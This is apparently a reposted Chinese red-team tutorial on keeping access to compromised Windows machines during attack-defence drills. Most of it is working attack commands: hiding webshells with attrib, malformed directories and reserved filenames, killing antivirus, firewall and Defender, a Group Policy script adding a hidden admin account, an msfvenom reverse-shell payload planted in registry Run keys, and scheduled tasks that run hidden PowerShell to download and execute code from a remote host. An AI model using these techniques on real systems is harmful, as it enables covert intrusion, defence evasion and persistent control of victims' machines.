文章目錄

• 1、前言
• • • 1.0、閑談
    • 1.1、攻擊思路
    • 1.2、得分情況
    • 1.3、在哪里做權(quán)限維持
• 2、windows權(quán)限維持
• • • 2.0、`以下姿勢不僅asp可以使用，php與jsp也可以使用。`
    • 2.1、“真正”隱藏文件
    • 2.2、系統(tǒng)文件夾圖標(biāo)
    • 2.3、畸形目錄
    • 2.4、系統(tǒng)保留文件名
    • 2.5、組合使用
    • 2.6、驅(qū)動級文件隱藏
• 3、關(guān)閉殺軟
• 4、組策略
• 5、注冊表（重要）（注意面紗）
• 6、計劃任務(wù)
• 7、內(nèi)存馬

1、前言

1.0、閑談

這一章節(jié)之前，建議大家學(xué)會寫poc，利用poc批量拿洞等等。

接著說說國家級虎王的情況。

國家級虎王，紅隊攻擊時間一般為30天，目標(biāo)一般總計會有60個目標(biāo)。第一批一般給30個目標(biāo)，之后每一周可以將一些未拿下的目標(biāo)與其他隊伍切換。一隊為3個人（一線），20年的標(biāo)準(zhǔn)，提供每個人提供3個機(jī)器，每個機(jī)器3個IP（一般非一個Ｃ段），原則上不允許使用除了這9個之外的IP進(jìn)行攻擊。 先捏軟柿子，一般目標(biāo)安全等級（互聯(lián)網(wǎng)>>金融>>政企、運營商）當(dāng)然有意外的情況，一些敏感的政企在互聯(lián)網(wǎng)上基本沒有暴露面（如XX導(dǎo)彈中心），這些服務(wù)一般全在內(nèi)網(wǎng)，大家的目標(biāo)之中假設(shè)有這些目標(biāo)直接放棄就好了，當(dāng)然APT的話另說，畢竟APT有著大量的時間去研究，而正常的虎王是很注重效率一說。

1.1、攻擊思路

在整個過程之中，思路是最重要的;即使是國際級的紅隊人員也是有很多知識是不懂現(xiàn)學(xué)的。

建議在攻擊的時候，畫一個思維導(dǎo)圖，這樣就可以很清晰的每一步自己在干什么，下步要干什么。

信息收集（一線與二線都會貫穿整個周期），假設(shè)二線的人員發(fā)現(xiàn)一個突破點也會交給一線。然后二線繼續(xù)做信息收集找更多的突破點。突破點多數(shù)在DMZ區(qū)域。 DMZ（外網(wǎng)）機(jī)器一定會做權(quán)限維持，之后的思路就是跨段，不要在DMZ區(qū)域晃了（哪怕很容易就能拿下第二臺DMZ區(qū)域的機(jī)器），優(yōu)先找可以跨段的機(jī)器（OA、SSO、運維）。

• 如何尋找可以跨段的機(jī)器？

  通過經(jīng)驗判斷 oa這種大概率都是跨區(qū)域的；堡壘機(jī)一般都是跨段的，如何尋找堡壘機(jī)？多個終端連接的大概率堡壘機(jī)（拿下的多臺機(jī)器通過netstart查看網(wǎng)絡(luò)連接，比如都與A這臺機(jī)器有鏈接，那么A機(jī)器就大概率是堡壘機(jī)）。拿下堡壘機(jī)的思路：~歷史漏洞~已經(jīng)拿下機(jī)器瀏覽器中有概率保存密碼

拿下DMZ區(qū)域可以跨段的機(jī)器之后，開始內(nèi)網(wǎng)穿透進(jìn)入內(nèi)網(wǎng)，在內(nèi)網(wǎng)可以進(jìn)行小范圍橫向，然后繼續(xù)橫向跨段、橫向跨段拿下辦公網(wǎng)的機(jī)器或核心網(wǎng)機(jī)器。

• 橫向用到的一些SMB掃描工具如fscan，

• 提權(quán)一般都是直接使用CS自帶/增加的一些提取模塊，

• 域滲透常用手段：

  PTH、黃金票據(jù)、一些漏洞如cve-2020-1472（置空域管理員的一個洞）。

1.2、得分情況

常規(guī)，

一個webshell、一個數(shù)據(jù)庫、主機(jī)權(quán)限都是50分主機(jī)最高權(quán)限100分，數(shù)據(jù)庫資料較多的話可以翻倍。

跨段，

但是跨段，比如從DMZ到內(nèi)網(wǎng)區(qū)域可以給1000分。DMZ與內(nèi)網(wǎng)段一般存在隔離的情況（邏輯隔離與硬件隔離），比如突破一個隔離的網(wǎng)段，一般可以拿3000~5000分。

靶標(biāo)，

除此之外，一般的攻防演練也存在靶標(biāo)（一般2~3個）的情況，一般一個靶標(biāo)1W分。所以在攻防演練的時候，一般很少去可以提權(quán)，意義不大，重點是跨段與靶標(biāo)。在之前的演練之中，某一個隊伍拿到靶標(biāo)之后，這個廠商就出局了，即別的隊伍在拿到靶標(biāo)也沒用了，當(dāng)然今年（21）靶標(biāo)一直存在。

1.3、在哪里做權(quán)限維持

在紅隊行動中在網(wǎng)絡(luò)中獲得最初的立足點是一項耗時的任務(wù)。因此，持久性是紅隊成功運作的關(guān)鍵，這將使團(tuán)隊能夠?qū)Ｗ⒂谀繕?biāo)，而不會失去與指揮和控制服務(wù)器的通信。

小結(jié)三種情況，

• DMZ的打點機(jī)器、

• 關(guān)鍵機(jī)器（可以跨段的機(jī)器）

• 存在大量數(shù)據(jù)的機(jī)器

  （如存在很多瀏覽器記錄、通訊錄等等可以對后續(xù)打點、橫向有幫助的機(jī)器）

2、windows權(quán)限維持

簡述：后門（webshell、粘貼鍵、放大鏡、主策略等等）+ 隱藏

權(quán)限維持的前提是已經(jīng)獲得機(jī)器的權(quán)限（可以不是最高權(quán)限，具體看需求）

在橫向的時候，一些工具往往需要大家進(jìn)行二開來躲避殺軟/流量分析。比如fscan，對于這種工具，一般來說只要修改流量上的特征即可，加一些亂碼或者其他的繞過特征檢測即可。

2.0、以下姿勢不僅asp可以使用，php與jsp也可以使用。

2.1、“真正”隱藏文件

命令如： attrib +s +a +h +r c:\test

想要取消的話，直接命令行執(zhí)行“ attrib -s -a -h -r c:\test ”即可，

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統(tǒng)文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。新建文件夾T，T內(nèi)新建A與B文件夾，我們使用命令行把A文件夾隱藏，A文件夾內(nèi)含有a.txt ；B文件夾含有b.txt文件。這樣就做到了真正的隱藏，不管你是否顯示隱藏文件，此文件夾都看不見，

但是仍然可以通過命令行進(jìn)入，

值得說的是，通過此方式隱藏的文件，使用命令行“ dir ”也無法看到a文件夾，

最后，想要看到這種文件，可以按照以下設(shè)置：

將此選擇項“ 去掉 ”即可。

2.2、系統(tǒng)文件夾圖標(biāo)

給B文件夾重新命名為：“我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”

這樣的話，不使用命令行是比較難發(fā)現(xiàn)的，且這個不僅僅是替換了圖標(biāo)，雙擊b文件夾，效果與真正的“我的電腦”是一致的，

想要看到b文件夾內(nèi)的真正文件，那就使用命令行把。

這里想要恢復(fù)的話，建議還是使用命令行改（直接修改文件夾是無法去掉“ .{20D04FE0-3AEA-1069-A2D8-08002B30309D} ”的）。使用命令行“ rename "我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" b ”這個“ 我的電腦xxx ”名字太長的話，可以使用tab鍵補齊，正常恢復(fù)，

除了命令行，我們也可以用WinRAR找到這個文件夾，然后重命名文件夾把后綴的“.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”刪除。然后我們再回到文件夾的存放地方，會發(fā)現(xiàn)已經(jīng)變回原來的普通文件夾了。

附帶一些常用文件代號：

我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}回收站.{645ff040-5081-101b-9f08-00aa002f954e}拔號網(wǎng)絡(luò).{992CFFA0-F557-101A-88EC-00DD010CCC48}打印機(jī).{2227a280-3aea-1069-a2de-08002b30309d}控制面板.{21ec2020-3aea-1069-a2dd-08002b30309d}網(wǎng)上鄰居.{208D2C60-3AEA-1069-A2D7-08002B30309D}

2.3、畸形目錄

原理是：

只需要在目錄名后面加兩個點（也可以為多個點）就行了，用戶圖形界面無法訪問。

在T文件夾新建” c.txt ”內(nèi)容隨意，使用命令行“ md c..\ ”創(chuàng)建“ C.. ”文件夾，這個最后的“\”是不能少的，創(chuàng)建之后圖形化無法查看、刪除該文件夾。

該文件夾，殺軟也是無法粉碎的，

然后將創(chuàng)建“ c.txt ”文件復(fù)制進(jìn)去，

使用URL訪問：/c…/c.asp （兩個點）

刪除目錄： rd /s /q c…\

2.4、系統(tǒng)保留文件名

利用系統(tǒng)保留文件名創(chuàng)建無法刪除的webshell，Windows 下不能夠以下面這些字樣來命名文件/文件夾，包括：aux，com1，com2，prn，con和nul等，但是通過cmd下是可以創(chuàng)建此類文件夾的，使用copy命令即可實現(xiàn)：

使用命令“ copt c.txt \\.\C:\Users\xx\Desktop\T\com1.asp ”

就可以創(chuàng)建名稱為“ com1.asp ”的文件名稱，

該文件無法通過圖形化正常打開，刪除。但是在IIS中又是可以成功解析的。

正常可以這么讀取 “ type \.\C:\Users\xx\Desktop\T\com1.asp”

刪除的話，命令“ del \\.\C:\Users\xx\Desktop\T\com1.asp ”，

讀取與刪除不加“ \.\ ”是無法讀取的。

2.5、組合使用

以上集中情況可以組合使用，

先整一個“ 系統(tǒng)文件夾圖標(biāo) ”下創(chuàng)建一個畸形目錄，畸形目錄下整一個無法刪除的文件名。

這一套下來，普通的防守方是很難搞定的。

2.6、驅(qū)動級文件隱藏

驅(qū)動隱藏最典型的現(xiàn)象就是系統(tǒng)盤中存在以下文件：

c:\WINDOWS\xlkfs.datc:\WINDOWS\xlkfs.dllc:\WINDOWS\xlkfs.inic:\WINDOWS\system32\drivers\xlkfs.sys

驅(qū)動隱藏我們可以用過一些軟件來實現(xiàn)，軟件名字叫：Easy File Locker

下載鏈接： http://www.xoslab.com/efl.html

一般做黑連的小朋友都會這樣設(shè)置：只勾選可讀，其他的一律拒絕。那么，會有這樣的效果，該文件不會顯示，不能通過列目錄列出來，也不能刪除，除非你知道完整路徑，你才可以讀取文件內(nèi)容。并且該軟件還可以設(shè)置密碼，啟動、修改設(shè)置、卸載及重復(fù)安裝的時候都需要密碼，更蛋疼的是，主界面、卸載程序等都可以刪除，只留下核心的驅(qū)動文件就行了。

如何清除（下邊是cmd命令）

1、查詢服務(wù)狀態(tài)： sc qc xlkfs2、停止服務(wù)： net stop xlkfs 服務(wù)停止以后，經(jīng)驅(qū)動級隱藏的文件即可顯現(xiàn)3、刪除服務(wù)： sc delete xlkfs4、刪除系統(tǒng)目錄下面的文件，重啟系統(tǒng)，確認(rèn)服務(wù)已經(jīng)被清理了。

3、關(guān)閉殺軟

拿到目標(biāo)主機(jī)的shell后第一件事就是關(guān)閉掉目標(biāo)主機(jī)的殺毒軟件，可以通過MSF命令” run killav ”，當(dāng)然很多情況下，此操作無法關(guān)閉到殺軟。我們使用使用一些開源的程序幫忙，如： https://github.com/Yaxser/Backstab 使用該軟件干掉殺軟之后要注意，defend存在一個自我保護(hù)機(jī)制（即使已經(jīng)被干掉），假設(shè)當(dāng)前機(jī)器沒有殺軟的情況下，隔幾分鐘自己就起來了。所以做一些危險操作的時候，干掉當(dāng)前設(shè)備的所以殺軟之后要計算好時間。

還有一些常用CMD命令（需要admin及其以上的權(quán)限）：

關(guān)閉防火墻命令：

netsh advfirewall set allprofiles state off

命令關(guān)閉Denfnder：

Net stop windefend

命令關(guān)閉/打開DEP（數(shù)據(jù)執(zhí)行保護(hù)）：

bcdedit.exe /set {current} nx Alwaysoff
bcdedit/set {current} nx AlwaysOn

參考連接： http://t.zoukankan.com/liqik-p-13046760.html

其他的補充：

命令關(guān)閉殺毒軟件： 在meterpreter下執(zhí)行run post/windows/manage/killavnet stop sharedaccess ----關(guān)系統(tǒng)自帶防火墻c:\pskill.exe ravmon ntsd –c -q -p PID ----殺掉瑞星軟件c:\pskill.exe pfw ----關(guān)天網(wǎng)防火墻net stop "Symantec AntiVirus" ----關(guān)諾頓企業(yè)版net stop KAVStart c:\pskill kavstart / KWatch ----關(guān)閉金山殺毒net stop fmdaemon c:\pskill.exe syncserver 關(guān)閉webguard主頁防修改軟件的方法把時間調(diào)到2038之后.卡巴出現(xiàn)錯誤.自動關(guān)閉將時間調(diào)到2099年，發(fā)現(xiàn)blackice服務(wù)停止關(guān)于諾頓企業(yè)版“文件自動防護(hù)“的關(guān)閉：1）關(guān)閉服務(wù)：net stop "Symantec AntiVirus"2)關(guān)閉進(jìn)程：Rtvscan，CCAPP，vptray，defwatch

4、組策略

相對來說，組策略后門更加隱蔽。往冊表中添加相應(yīng)鍵值實現(xiàn)隨系統(tǒng)啟動而運行是木馬常用的伎倆，也為大家所熟知。其實，在組策略中也可以實現(xiàn)該功能，不僅如此它還可以實現(xiàn)在系統(tǒng)關(guān)機(jī)時進(jìn)行某些操作。這就是通過最策略的“腳本(啟動/關(guān)機(jī))”項來說實現(xiàn)。具體位置在 “計算機(jī)配置→Windows設(shè)置” 項下。因為其極具隱蔽性，因此常常被攻擊者利用來做服務(wù)器后門。 　 攻擊者獲得了服務(wù)器的控制權(quán)就可以通過這個后門實施對對主機(jī)的長期控制。它可以通過這個后門運行某些程序或者腳本，最簡單的比如創(chuàng)建一個管理員用戶，他可以這樣做：新建一個文件“ a.bat ”將下邊的內(nèi)容復(fù)制到文件中，echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit在“運行”對話框中輸入gpedit.msc，定位到“計算機(jī)配置一>Windows設(shè)置一>腳本(啟動/關(guān)機(jī))”,雙擊右邊窗口的“關(guān)機(jī)”，在其中添加add.bat。 當(dāng)系統(tǒng)關(guān)機(jī)時創(chuàng)建hack$用戶。對于一般的用戶是根本不知道在系統(tǒng)中有一個隱藏用戶，就是他看見并且刪除了該帳戶，當(dāng)系統(tǒng)關(guān)機(jī)時又會創(chuàng)建該帳戶。所以說，如果用戶不知道組策略中的這個地方那他一定會感到莫名其妙。其實，對于組策略中的這個“后門”還有很多利用法，攻擊者通過它來運行腳本或者程序，嗅探管理員密碼等等。當(dāng)他們獲取了管理員的密碼后，就不用在系統(tǒng)中創(chuàng)建帳戶了，直接利用管理員帳戶遠(yuǎn)程登錄系統(tǒng)。因此它也是“雙刃劍”，希望大家重視這個地方。當(dāng)你為服務(wù)器被攻擊而莫名其妙時，說不定攻擊者就是通過它實現(xiàn)的。當(dāng)然缺點也很明顯，就是這個目錄一般都會被殺毒工具、或者藍(lán)隊進(jìn)行針對性的排查。

參考連接：https://buaq.net/go-27418.html

5、注冊表（重要）（注意面紗）

簡單的說，通過修改注冊表的值達(dá)到注冊表的后門。

其目的和組策略一致，即用戶登錄系統(tǒng)的時候自動執(zhí)行攻擊者的后門如（msf的木馬）。

區(qū)別是組策略是按照用戶組劃分 注冊表是事件觸發(fā)的。

使用命令生成MSF木馬：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=6666 -f exe -o pentestlab.exeMSF開啟監(jiān)聽，

復(fù)制木馬到吧唧C盤用戶目錄下，在八級執(zhí)行下邊命令（4條中得隨機(jī)一條即可）：

該注冊表操作語句會在目標(biāo)主機(jī)的啟動項里增加一個命名。

當(dāng)目標(biāo)主機(jī)登錄系統(tǒng)時，后門就會運行。這里注意得是

• 鎖屏登陸 不屬于登陸。

• 假設(shè)4條都執(zhí)行了，正常來說會返回4條會話。

• 部分電腦沒有后兩個的注冊表鍵值，建議實戰(zhàn)選擇前兩個。

  （要選擇有的鍵值，不同windows版本鍵值不是完全一樣的）

• 以這種方式得后門，重啟機(jī)器后無論哪個是哪個用戶登錄了系統(tǒng)，傳回msf的權(quán)限都是設(shè)置上述注冊列表的用戶權(quán)限。

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"

下邊的4條命令需要管理員權(quán)限才可以添加，

與上邊不同的是，上邊的幾條語句是添加在當(dāng)前的用戶下，幾乎任何人都可以看到，

下邊的只有管理員權(quán)限才可以操作，是添加到系統(tǒng)層面，非管理員權(quán)限是無法查看的。

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"

• Meterpreter –Run鍵

另外還存在兩個注冊表位置，這些位置可以放置一些DLL文件或者exe來實現(xiàn)持久性。在用戶登錄系統(tǒng)的時候被執(zhí)行，注意的是下邊兩條命令需要管理員權(quán)限，還有計算機(jī)不一定存在這兩個注冊表。

• 其他

當(dāng)已經(jīng)存在一個MSF會話的時候，我們可以直接執(zhí)行語句：run persistence -U -P windows/meterpreter/reverse_tcp -i 5 -p 6669 -r 192.168.1.108會生成一個VBS的腳本，然后自動上傳到目標(biāo)機(jī)器上，最后創(chuàng)建一個注冊列表當(dāng)用戶登錄的時候自動運行該后門。（注意要開啟一個新的對應(yīng)監(jiān)聽）

6、計劃任務(wù)

• 計劃任務(wù)操作需要管理員以上的權(quán)限。

• 計劃任務(wù)中最主要的是不要寫錯“ 時間點 ”與“ 觸發(fā)條件 ”，

一般來說，計劃任務(wù)不被發(fā)現(xiàn)的兩個點：

~觸發(fā)條件~隱藏的稍微深一點

計劃任務(wù)也可以通過圖形化界面創(chuàng)建，計劃任務(wù)默認(rèn)是放到比較靠前的，

實戰(zhàn)圖像化的話，可以放在子集目錄，

• 比較常用的幾個計劃任務(wù)：

#(X64) - On System Start system用戶登錄的時候觸發(fā) schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onstart /ru System#(X64) - On User Idle (30mins) 每30分鐘觸發(fā) schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onidle /i 30#(X86) - On User Login 用戶登錄的時候觸發(fā) schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onlogon /ru System#(X86) - On System Start 當(dāng)system啟用的時候觸發(fā) schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onstart /ru System#(X86) - On User Idle (30mins) 每30分鐘觸發(fā)一次 schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onidle /i 30

補充

這個c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe是要執(zhí)行程序的絕對路徑，實戰(zhàn)中可以直接換位面紗嗎。后邊的是參數(shù)，這個是可選條件:-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'

7、內(nèi)存馬

Java為主，實戰(zhàn)當(dāng)中都是提前準(zhǔn)備好，不會現(xiàn)場寫。

日后在補充。

總結(jié)

以上是生活随笔為你收集整理的小白白红队初成长（5）win权限维持的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。